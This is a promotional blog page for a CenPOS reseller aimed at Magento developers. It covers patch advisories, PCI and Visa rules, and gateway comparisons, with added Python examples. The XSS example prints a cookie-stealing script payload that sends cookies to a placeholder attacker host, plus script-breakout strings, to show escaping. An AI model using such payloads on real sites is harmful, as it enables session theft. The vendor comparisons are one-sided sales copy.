Magento Security Alert requires action to maintain PCI Compliance

Magento 2.3.1, 2.2.8 and 2.1.17 Security Update

A SQL injection vulnerability has been identified in Magento code prior to the 2.3.1, 2.2.8 and 2.1.17 releases. To protect your store from this one vulnerability quickly, install patch PRODSECBUG-2198. To protect against this vulnerability and the others fixed in the same release, upgrade to Magento Commerce or Open Source 2.3.1, 2.2.8 or 2.1.17. We strongly suggest that you install these full releases as soon as you can.
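As a quick way to see where a store stands against the releases named above, here is a small Python version triage script. It is an added example, not Magento's own tooling. It assumes the version string comes from `bin/magento --version` in the form `Magento CLI 2.x.y`, and the sample strings are constructed. A store that applied the standalone PRODSECBUG-2198 patch while staying on an older release will still report as "vulnerable" here; that is intentional, because the version alone cannot prove the patch was applied, and the other fixes in the release are still missing.

```python
"""Triage reported Magento versions against the March 2019 fix releases
(2.3.1, 2.2.8, 2.1.17) named in the advisory above.

Added example, not Magento code. Assumes `bin/magento --version` output of the
form "Magento CLI 2.x.y"; all sample strings below are constructed.
"""
import re
from typing import Optional, Tuple

# Minimum fixed release per supported branch, as listed in the advisory.
FIXED_BY_BRANCH = {
    (2, 3): (2, 3, 1),
    (2, 2): (2, 2, 8),
    (2, 1): (2, 1, 17),
}

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract the first MAJOR.MINOR.PATCH triple from CLI output; None if absent."""
    m = VERSION_RE.search(text)
    return tuple(int(x) for x in m.groups()) if m else None


def fix_status(cli_output: str) -> str:
    """Return 'patched', 'vulnerable' or 'unknown' for one version string.

    'unknown' covers unparsable output and branches the advisory does not list
    (for example 2.0.x), so callers must treat it as needing manual review,
    never as safe.
    """
    v = parse_version(cli_output)
    if v is None:
        return "unknown"
    fixed = FIXED_BY_BRANCH.get(v[:2])
    if fixed is None:
        return "unknown"
    return "patched" if v >= fixed else "vulnerable"


def triage(outputs):
    """Map each CLI output line to its status."""
    return {line: fix_status(line) for line in outputs}


if __name__ == "__main__":
    # Constructed sample outputs, not taken from any real store.
    samples = ["Magento CLI 2.3.0", "Magento CLI 2.3.1", "Magento CLI 2.2.8",
               "Magento CLI 2.1.16", "Magento CLI 2.0.18", "garbage"]
    for line, status in triage(samples).items():
        print(f"{line:22s} -> {status}")
```

Run it against the output of `bin/magento --version` on each store you maintain; anything that is not "patched" goes on the upgrade list, and "unknown" means a branch that needs a manual decision rather than a version check.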

PCI DSS Requirement 6: Develop and maintain secure systems and applications. All critical systems must have the most recently released software patches installed to prevent exploitation. The average merchant relies on third-party developers for web site maintenance, but unless those developers are specifically contracted to update the e-commerce software and its add-on modules, don't count on it happening.

Verizon 2015 PCI Compliance Report: "Only 16.4% of organizations that had suffered a data breach were compliant with Requirement 6, compared to an average of 64% of organizations assessed by our QSAs in 2014."

Payment gateway integration requirements have changed over time, partly in response to cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks, to meet current PCI compliance standards. Merchants should verify that all components of their ecommerce ecosystem are current, and have a system for ongoing monitoring and updating.

RESOURCES

  • Magento Security Center
  • MAGENTO SECURITY ALERT, March 26, 2019
  • Christine Speedy, 3D Merchant Services, offers a Magento payment gateway module for merchants to improve their omnichannel customer experience and mitigate fraud and vulnerability risk. Special B2B customer benefits include friction-less payments across all sales channels; text and email Express Checkout, customer invoice portal for 24/7 ACH, credit card, wire and more payment types, and US EMV with level 3 processing. Magento and ERP modules combine to provide a powerful array of solutions to improve cash flow and profits while maximizing security. 954-942-0483.

Magento Developer Alert: Visa Mandate and Payment Gateways

How can Magento developers help merchants get compliant with the Visa Stored Credential Transaction framework and mandates effective October 14, 2017?

Drive your profits while helping clients keep compliant with fast changing credit card processing rules.

Step-by-step guide:

How will clients manage consent record requirements? See Improving Authorization Management for Transactions with Stored Credentials, https://usa.visa.com/dam/VCOM/global/support-legal/documents/stored-credential-transaction-framework-vbs-10-may-17.pdf . Will the gateway provide a checkbox for consent records and the ability to retrieve records on demand? (I called Authorize.net on October 2 and they advised they will not offer this service and will leave it up to merchants.) Will you develop a custom application that captures the opt-in date, time and other required fields, plus storage and retrieval capability? Or will you advise merchants to choose a technology solution, including the payment gateway, that manages this automatically? CenPOS, a merchant-centric, end-to-end payments engine that drives enterprise-class solutions for businesses, saving them time and money while improving their customer engagement, will provide an automated solution for clients. Contact me for the plugin.

Update terms and conditions. Ensure online order terms include sale, refund and cancellation policies. Add a checkbox for customer opt-in to the terms, including online payments. CenPOS has an opt-in box whose text you can customize.

Verify whether there is a system to manage authorization validity. What the heck does that mean? Many businesses, especially B2B companies, have complex needs including pre-authorizations, incremental authorizations, delayed shipping and so on. A merchant may get an issuer approval, but that does not mean the authorization is still valid at settlement. The two most common rules businesses struggle with are "settlement within 72 hours" for card-not-present sales, and "authorization amount and settlement amount must be equal". (I asked Authorize.net support about both items on October 2 and was told they do not offer an automated solution.) CenPOS automates compliance. Other payment gateways are incapable, or may leave it up to developers to create a solution. How can a developer verify whether a merchant has an issue? Ask clients to look at their merchant statement's "pending interchange fees". If you see EIRF or STD, that's a red flag that there is a problem.
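As an added illustration (not CenPOS, Authorize.net or Magento code), the following Python checker applies the two rules named above to a batch of authorization records and lists the ones at risk of downgrade: captures later than 72 hours after authorization, captures that differ from the authorized amount, and open authorizations that have already aged past the window. The record layout and all transactions are constructed; the 72-hour window and the equal-amount rule are taken as stated in the text, so confirm both against your acquirer's current interchange documentation before relying on them.

```python
"""Flag card-not-present authorizations that break the two rules the text names:
settlement within 72 hours of authorization, and capture amount equal to the
authorized amount. Added example; not gateway or Magento code. The record
layout, the transactions and the window length are constructed/as stated.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from decimal import Decimal
from typing import Dict, List, Optional

SETTLEMENT_WINDOW = timedelta(hours=72)   # as stated in the text; verify with acquirer
SAMPLE_NOW = datetime(2019, 4, 8, 9, 0)   # constructed "current time" for the sample run


@dataclass
class Auth:
    txn_id: str
    auth_at: datetime
    auth_amount: Decimal
    captured_at: Optional[datetime] = None     # None = still open
    capture_amount: Optional[Decimal] = None


def check_auth(a: Auth, now: datetime) -> List[str]:
    """Return the rule violations for one authorization (empty list = clean)."""
    issues: List[str] = []
    if a.captured_at is None:
        # Still open: once finally captured it will already be outside the window.
        if now - a.auth_at > SETTLEMENT_WINDOW:
            issues.append("uncaptured beyond 72h")
        return issues
    if a.captured_at - a.auth_at > SETTLEMENT_WINDOW:
        issues.append("settled after 72h")
    if a.capture_amount != a.auth_amount:
        issues.append(f"amount mismatch auth={a.auth_amount} capture={a.capture_amount}")
    return issues


def downgrade_report(auths: List[Auth], now: datetime) -> Dict[str, List[str]]:
    """Map txn_id -> violations for every authorization that has at least one."""
    report: Dict[str, List[str]] = {}
    for a in auths:
        issues = check_auth(a, now)
        if issues:
            report[a.txn_id] = issues
    return report


def sample_auths() -> List[Auth]:
    """Constructed records: one clean, one late, one partial capture, one stale open auth."""
    t0 = datetime(2019, 4, 1, 9, 0)
    return [
        Auth("A1", t0, Decimal("120.00"), t0 + timedelta(hours=5), Decimal("120.00")),
        Auth("A2", t0, Decimal("80.00"), t0 + timedelta(days=5), Decimal("80.00")),
        Auth("A3", t0, Decimal("500.00"), t0 + timedelta(hours=1), Decimal("450.00")),
        Auth("A4", t0, Decimal("60.00")),
    ]


if __name__ == "__main__":
    for txn, issues in downgrade_report(sample_auths(), SAMPLE_NOW).items():
        print(txn, "; ".join(issues))
```

Feed it an export of your gateway's authorization and capture records and compare the flagged transactions against the EIRF/STD lines on the merchant statement; if the two sets line up, the downgrade cause is process, not pricing.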

Create a hosted pay page. B2B businesses almost always have more than one sales channel, and use of paper credit card authorization forms is common. They need help eliminating them. You already have the SSL certificate, so it's a natural add-on to provide clients a secure web page with an iframe solution to collect payments. With CenPOS, end customers can use the same stored credential in Magento and on the pay page, for both credit card and ACH.

Prevent brute force attacks. System hardening is a PCI compliance requirement. See Visa best practices to prevent brute force attacks: https://usa.visa.com/support/merchant/library/visa-merchant-business-news-digest.html . CenPOS includes reCAPTCHA, client-managed velocity rules and other rules as part of a layered security approach.
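One of the layers the previous paragraph mentions, a velocity rule, is shown below as an added Python example; it is not CenPOS code and makes no claim about how CenPOS implements its rules. It is a sliding-window limiter keyed on the client IP and on a card fingerprint, the two signals that distinguish card testing (one client, many cards) from an ordinary retry (one card, a few attempts). The thresholds, the rule names and the attempt stream are constructed.

```python
"""Sliding-window velocity limiter for a hosted pay page, as one layer against
brute-force / card-testing attempts. Added example, not CenPOS code. Rule
thresholds, key names and the sample attempt stream are constructed.
Keys are hashed so the counter store never holds a raw PAN or IP.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
import hashlib
from typing import Dict, List


@dataclass
class VelocityRule:
    name: str       # the attribute the rule keys on, e.g. "ip" or "card"
    window_s: int   # sliding window length in seconds
    limit: int      # attempts allowed inside the window before tripping


class VelocityLimiter:
    def __init__(self, rules):
        self.rules = list(rules)
        # rule name -> hashed key -> deque of attempt timestamps (oldest first)
        self._hits = {r.name: defaultdict(deque) for r in self.rules}

    @staticmethod
    def _key(value: str) -> str:
        return hashlib.sha256(value.encode()).hexdigest()[:16]

    def check(self, ts: float, keys: Dict[str, str]) -> List[str]:
        """Record one attempt at time ts and return the names of the rules it trips.

        keys maps rule name -> raw value (client IP, card fingerprint, ...).
        The attempt is recorded even when it trips a rule, so a rejected client
        cannot reset its own counter by being rejected.
        """
        tripped = []
        for rule in self.rules:
            raw = keys.get(rule.name)
            if raw is None:
                continue
            q = self._hits[rule.name][self._key(raw)]
            while q and ts - q[0] >= rule.window_s:   # evict attempts outside the window
                q.popleft()
            q.append(ts)
            if len(q) > rule.limit:
                tripped.append(rule.name)
        return tripped


def run_sample():
    """Constructed stream: card testing from one IP, then one card retried too often."""
    limiter = VelocityLimiter([
        VelocityRule("ip", window_s=60, limit=5),
        VelocityRule("card", window_s=3600, limit=3),
    ])
    # One client cycling through a new card every 5 seconds: the IP rule trips
    # on the sixth attempt and stays tripped for the rest of the burst.
    blocked_at = []
    for i in range(8):
        if limiter.check(1000.0 + i * 5, {"ip": "203.0.113.7", "card": f"fp-{i}"}):
            blocked_at.append(i)
    # A different client retrying the same card every 10 minutes: the IP rule
    # never trips, the card rule trips on the fourth attempt within the hour.
    retries = [limiter.check(2000.0 + i * 600, {"ip": "198.51.100.2", "card": "fp-x"})
               for i in range(4)]
    return blocked_at, retries


if __name__ == "__main__":
    print(run_sample())
```

The counters here live in process memory; behind more than one web node they belong in a shared store with the same eviction logic. Pair the limiter with the CAPTCHA and the zero-dollar account verification mentioned elsewhere on this page, since a limiter only slows an attacker down, it does not tell you whether the card is real.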

Payment Gateway checklist:

  • Verify that the payment gateway will send the correct transaction data and indicators for the initial transaction and for subsequent transactions.
  • Advise clients to set gateway for zero dollar authorization when storing a new card.
  • Ensure the client is registered for 3-D Secure and that it is enabled.
  • Confirm whether the gateway will automatically flag a transaction as a customer-initiated stored credential transaction or a merchant-initiated one (automated recurring billing). Additionally, the merchant-initiated transaction must be sent with the MOTO indicator, not the ecommerce indicator.
  • Does the gateway support level 3 data?

CenPOS manages all compliance and other items seamlessly in the background.

Communicate with clients. Advise them that any upcoming changes will increase efficiency and security for everyone. Advise clients to learn more about the CenPOS payment gateway; call Christine Speedy, 954-815-6040.

Why comply? With full compliance and by following my recommendations, merchants can expect better-qualified interchange rates, increased approvals (avoiding declines from issuers' risk-averse algorithms), reduced PCI compliance burden, fraud liability shift to the issuer, and increased efficiency for both buyer and seller. The cost of non-compliance is hefty, including higher interchange rates, penalty fees, and the risk of both issuer and cardholder chargebacks.

(Image: interchange rate qualification, the same transaction processed at different rates)

The same transaction can process at different rates as shown above, depending on which rules you follow. CenPOS Smart Rate Selector automates compliance to qualify transactions at the lowest rate possible. Which rates are on your merchant statement now?

Magento developer billing: developers also need to comply with the recurring billing requirements for their own sales. What worked before is not compliant; everyone needs to change.

Resources and documentation: /blog/merchant-bulletins-downloads (bookmark it). Join Christine Speedy's email list.

DISCLAIMER: condensed and incomplete information! Information may be quickly outdated.

With the fast pace of changing rules, developers need a technology partner to automate compliance. Did you know?

  • For those not ready to give up paper, CenPOS creates a printable PCI Compliant credit card authorization form for every stored card.
  • CenPOS has ERP, ecommerce shopping cart, accounting and other plug-in modules available for quick and easy implementation.
  • I’ve been selling for CenPOS since day 1. Though I have other payment gateways available in my arsenal, nothing else compares for meeting business to business needs.

Christine Speedy, CenPOS authorized reseller, 954-942-0483 is based out of South Florida and NY. CenPOS is a merchant-centric, end-to-end payments engine that drives enterprise-class solutions for businesses, saving them time and money, while improving their customer engagement. CenPOS secure, cloud-based solution optimizes acceptance for all payment types across multiple channels without disrupting the merchant’s banking relationships.

MAGENTO VULNERABILITIES IMPACT PCI COMPLIANCE

Magento, a popular e-commerce platform, released multiple security patches this year, several addressing critical- and high-severity vulnerabilities that could lead to credit card data breaches. Merchants that haven't deployed the security patches, as required by PCI standards, are vulnerable to remote exploits that can compromise customer account and credit card data.

One cross-site scripting (XSS) flaw potentially allows an attacker to inject malicious JavaScript into an order comment via the PayFlow Pro payment module. Because the comment is stored and later rendered in the admin panel, the script executes in the browser of the site administrator who views the attacker's order, with whatever access that administrator's session has.
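The fix for that class of bug is output encoding chosen for the context the untrusted comment lands in. The Python example below is added here to show the defective rendering next to the corrected one; Magento itself is PHP, and this is not its template code. The admin template fragments, the attacker's comment text and the `attacker.example` host are constructed. It also shows, beyond the HTML case in the text, why HTML escaping is not enough when the same comment is dropped into an inline script.

```python
"""Stored XSS in an order comment: defective vs. corrected rendering, for two
output contexts. Added example, not Magento's template code. The template
fragments and payloads are constructed; attacker.example is a placeholder host.
"""
import html
import json

# Constructed attacker comments of the kind the text describes.
XSS_PAYLOAD = ("Great service! <script>document.location="
               "'https://attacker.example/?c='+document.cookie</script>")
QUOTE_BREAKOUT = '";alert(1);//'                        # breaks out of a JS string
SCRIPT_BREAKOUT = '</script><script>alert(1)</script>'  # closes an inline <script>


def render_comment_unsafe(comment: str) -> str:
    """Defective: attacker text spliced straight into admin HTML."""
    return f'<p class="order-comment">{comment}</p>'


def render_comment_html(comment: str) -> str:
    """Corrected for an HTML text/attribute context: escape < > & " '."""
    return f'<p class="order-comment">{html.escape(comment, quote=True)}</p>'


def render_comment_js_unsafe(comment: str) -> str:
    """Defective: the comment is placed inside an inline JS string literal."""
    return f'<script>var note = "{comment}";</script>'


def render_comment_js(comment: str) -> str:
    """Corrected for an inline-script context.

    JSON-encode to get a valid JS string literal (quotes and control characters
    escaped), then neutralise "</" so the payload cannot close the enclosing
    <script> element; html.escape() would instead leave literal &lt; in the JS.
    """
    literal = json.dumps(comment).replace("</", "<\\/")
    return f"<script>var note = {literal};</script>"


def demo():
    """Return the four renderings of the cookie-stealing payload for inspection."""
    return {
        "html_unsafe": render_comment_unsafe(XSS_PAYLOAD),
        "html_safe": render_comment_html(XSS_PAYLOAD),
        "js_unsafe": render_comment_js_unsafe(SCRIPT_BREAKOUT),
        "js_safe": render_comment_js(SCRIPT_BREAKOUT),
    }


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"{name}: {out}")
```

Magento's own templates expose escaping helpers for exactly this purpose; the point is that the helper has to match the context (HTML body, attribute, URL, inline script), and an order comment is only safe in the one it was encoded for.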


RESOURCES

  • Magento Security Center
  • VISA MAGENTO SECURITY ALERT, July 2016
  • Christine Speedy, 3D Merchant Services, offers a Magento payment gateway module for merchants to improve their omnichannel customer experience and mitigate risk. B2B customer benefits include friction-less payments across all sales channels; text and email Express Checkout, a customer invoice portal for 24/7 ACH, credit card, wire and more payment types, and US EMV with level 3 processing. Magento and ERP modules combine to provide a powerful array of solutions to improve cash flow and profits while maximizing security. 954-942-0483.

B2B Magento payment gateway extension -CenPOS

The perfect global B2B Magento payment gateway extension must support level 3 processing, since it significantly impacts profit margins. Connecting to Dynamics AX, Infor, SAP and other ERPs can also help reduce the PCI compliance burden, with one gateway for all revenue channels.

For international sales needs, a global gateway can be more than a secure payment module. For example, with CenPOS treasury management, route transactions to the local bank partner based on the card issuer.

  • Eliminate expensive cross-border interchange fees
  • Route processing to countries with lower interchange rates
  • Eliminate currency exchange fees when repatriating funds back to country where sale originated
  • Qualify for level 3 interchange rates on eligible corporate, purchasing and business cards; beyond merely supporting level 3 data, there are many rules to comply with to get the reduced rates

The CenPOS Magento module is not available in any marketplace. To get it FREE, contact Christine Speedy today, 954-942-0483.

Magento B2B Payment Gateway Developer Selection – CenPOS vs Authorize.net vs

Which is the best payment gateway for Magento developers' B2B clients?

The answer lies in Magento top user concerns, which are security & PCI Compliance, cost, customer experience and flexibility with other systems including ERP and accounting.

Security and PCI Compliance: PCI should be a non-issue, as any payment gateway suggested for a B2B company should be PCI DSS Level 1 compliant. However, developers can help merchants reduce their PCI compliance burden by partnering with a B2B payment gateway specialist who can recommend solutions compatible with all of the business's needs, not just Magento. For example, does the business also send invoices from an ERP? Do salespeople or credit managers receive credit card numbers by fax or phone? Magento developers are not payments experts and cannot be expected to ask the right questions to solve these unrelated compliance problems.

Internal and external fraud protection are critical. At a minimum, the payment gateway must support 3-D Secure, including Verified by Visa and MasterCard SecureCode to shift liability for certain types of fraud from merchant to card issuer.

Payment Gateway Cost: The worst mistake is recommending or selecting a payment gateway based on per-transaction cost. The payment gateway plays a critical role in interchange rate qualification, which makes up over 95% of merchant fees. Gateway capabilities, or the lack of them, can literally double the cost of credit card acceptance for B2B. The most important base criterion is support for Level 3 processing. There are many nuances to qualifying transactions correctly that most credit card processor salespeople don't understand, so there is little expectation that a developer would have the global financial expertise to recommend the best choice.

Treasury Management: Where are your customers? Where are your offices? What currency do you want to collect and bill in? Authorize.net has virtually nothing to help manage cross-border sales. CenPOS has a multitude of treasury solutions that can be customized.

For example, a company bills everything from the US, but also has operations in Canada and the European Union. Authorize.net will process every transaction in USD. The company pays cross-border fees on foreign issued cards, which now exceed 1% in some cases, and then pays again to repatriate revenue back to the EU or Canadian operations. CenPOS automatically identifies and processes the transaction in the local issuer currency, avoiding costly cross-border fees and more expensive US interchange rates, and deposits in the regional account. It does this seamlessly with no special developer programming.

Customer Experience: Will the gateway enhance or detract? In most cases there is very little difference in the checkout experience, but for B2B there is a bigger picture. What if the customer buys via multiple channels? Sharing tokens across multiple channels, including for emailed invoices, may be important. A holistic look at all sales channels and payment methods is essential, but it is not a good use of a developer's time, so deferring to a payment expert will yield a better ROI for the developer and a better result for the business.

Flexibility: Payment acceptance types, global availability, omnichannel integrations, flexibility and scalability are all factors in choosing not only the best B2B payment gateway for Magento, but also for the entire organization. For example, if there’s also a retail component, US businesses also need an EMV solution that supports level 3 processing for retail. If the distributor is global, how many countries is the gateway available in?

Back Office Efficiency: If you’ve ever done research in Authorize.net reports, and then in CenPOS, you’ll appreciate the massive difference between download and search vs dynamic drill down within CenPOS online reports. CenPOS reports were designed with input from today’s businesses, not those of over a decade ago. Too many differences to mention here.

There's a plethora of misinformation across multiple industries, from consultants to developers. Defaulting to Authorize.net or Payflow Pro because they are two of the oldest payment gateways is an injustice to the end user. Payment gateway selection plays a crucial role in business profits, security and efficiency. By partnering with a payments expert, clients are provided the best solution, and Magento developers can grow revenues with the specialty implementation and add-on services the expert recommends.

"I have some knowledge of Magento, including as a developer in its early years, but I'm not a Magento expert," says Christine Speedy, owner of 3D Merchant Services and B2B payment gateway expert. "Likewise, there are great B2B Magento developers who are not payment gateway experts. By partnering, we can offer businesses more appropriate solutions to maximize profits and security, while also mutually benefiting."